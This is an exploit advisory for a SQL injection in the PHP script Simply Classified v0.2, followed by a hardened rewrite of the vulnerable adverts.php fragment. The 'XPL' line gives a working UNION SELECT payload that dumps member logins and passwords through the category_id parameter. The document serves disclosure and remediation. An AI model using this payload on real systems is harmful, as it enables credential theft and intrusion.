==============================================================================
     _     _       _         _     _   _
    / \   | |     | |       / \   | | | |
   / _ \  | |     | |      / _ \  | |_| |
  / ___ \ | |___  | |___  / ___ \ |  _  |      IN THE NAME OF
 /_/   \_\|_____| |_____|/_/   \_\|_| |_|
==============================================================================
   ____     _     _   _    ___    _  __
  / ___|   / \   | \ | |  / _ \  | |/ /
 | |  _   / _ \  |  \| | | | | | | ' /
 | |_| | / ___ \ | |\  | | |_| | | . \
  \____|/_/   \_\|_| \_|  \___/  |_|\_\     A Baloch From Iran
==============================================================================
 Simply Classified v0.2 (category_id) SQL Injection Vulnerability
==============================================================================

 [»] Script:   [ Simply Classified v0.2 ]
 [»] Language: [ PHP, MySQL ]
 [»] Website:  [ http://www.hotscripts.com/listing/simply_classifieds/ ]
 [»] Type:     [ Free|OS ]
 [»] Today:    [ 26032009 ]
 [»] Founder:  [ G4N0K | mail[.]ganok[sh!t]gmail.com ]

 ===[ code! ]===

 [+] adverts.php, 33-34

 {...}
 <?php
 $id = $_GET['category_id'];                    // <== you know!
 $query = "SELECT * FROM type WHERE id=$id" ;   // <== did you get it?, damn, check it again.
 $result = mysql_query($query);
 $row = mysql_fetch_array($result);
 ?>
 {...}

 ===[ XPL ]===

 [»] http://127.0.0.1/classified/adverts.php?category_id=5 UNION ALL SELECT 1,2,concat(login,0x3a,passwd),4,5,6,7,8,9,10 FROM members

 ===[ LIVE ]===

 [»] N/A

 ===[ Greetz ]===

 [»] ALLAH

===============================================================================
 D-End...
===============================================================================
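The fragment above puts $_GET['category_id'] straight into the SQL string, which is why the UNION payload listed under XPL works. The following is an added example of how adverts.php could be hardened; it is not code from Simply Classified, and the connection parameters (host, user, password, database name) are placeholders.

```php
<?php
// Hardened rewrite of the adverts.php fragment (added example, not the project's code).
// Two independent layers: the id is validated as an integer before use, and the
// query binds it as a parameter, so input such as "5 UNION ALL SELECT ..." never
// becomes part of the SQL text.

/**
 * Validate category_id: must be a decimal integer string of 1-10 digits.
 * Returns the id as int on success, null on any other input.
 */
function parse_category_id($raw): ?int
{
    if (!is_string($raw) || !preg_match('/^\d{1,10}$/', $raw)) {
        return null; // spaces, keywords or quotes fail here
    }
    return (int) $raw;
}

$id = parse_category_id($_GET['category_id'] ?? '');
if ($id === null) {
    http_response_code(400);
    exit('invalid category_id');
}

// Placeholder connection details; replace with the site's real config include.
$db = new mysqli('localhost', 'db_user', 'db_pass', 'classified');
$db->set_charset('utf8mb4');

// Prepared statement: the value is sent separately from the query text,
// so the database never parses it as SQL (replaces the old mysql_query call).
$stmt = $db->prepare('SELECT * FROM type WHERE id = ?');
$stmt->bind_param('i', $id);
$stmt->execute();
$row = $stmt->get_result()->fetch_assoc();
$stmt->close();
```

Even with the integer check, the bound parameter is the part that matters: it keeps the query shape fixed regardless of what the validation lets through.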